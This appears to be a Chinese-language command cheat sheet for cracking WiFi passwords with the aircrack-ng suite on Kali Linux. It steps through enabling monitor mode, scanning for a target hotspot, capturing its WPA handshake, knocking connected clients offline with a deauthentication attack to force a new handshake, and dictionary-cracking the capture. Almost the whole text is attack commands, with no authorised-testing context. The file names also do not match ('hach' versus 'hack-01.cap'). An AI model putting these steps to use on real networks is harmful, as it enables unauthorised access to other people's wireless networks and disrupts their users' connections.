iwconfig 查看无线网卡状态 如果Off需要开启
ifconfig wlan0 up 启动wlan0网卡
ifconfig wlan0 再次查看无线网卡状态
airmon-ng start wlan0 开启监听模式
iwconfig 检查无线网卡状态是否mon监听
airodump-ng wlan0mon 扫描wifi网络
--------------监听前网卡设置-------------------------------------
1.使用airmon-ng命令检查网卡是否支持监听模式
root@kali:~# airmon-ng
2.开启无线网卡的监听模式
root@kali:~# airmon-ng start wlan0
3.开启监听模式之后,无线接口wlan0变成了wlan0mon,可以使用ifconfig命令查看
4.扫描环境中的WiFi网络
root@kali:~# airodump-ng wlan0mon
当搜索到我们想要破解的WiFi热点时可以 Ctrl+C 停止搜索。
5.抓取握手包
使用网卡的监听模式抓取周围的无线网络数据包,当有新用户连接WiFi时会发送握手包。
root@kali:~# airodump-ng -c 4 --bssid AA:AA:AA:AA:AA:AA -w hach wlan0mon
AA:AA:AA:AA:AA:AA 路由的BSSID
-c 指定信道,上面已经标记目标热点的信道
-bssid指定目标路由器的BSSID,就是上面标记的BSSID
-w指定抓取的数据包保存的目录
6.进行破解WIFI密码(跑包)
root@kali:~#aircrack-ng -a2 -b AA:AA:AA:AA:AA:AA -w pass.txt hack-01.cap
抓不到握手包就aireplay-ng让station下线重发握手包
root@kali:~#aireplay-ng -0 10 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB wlan0mon
-a 被攻击路由的BSSID
-c station的MAC地址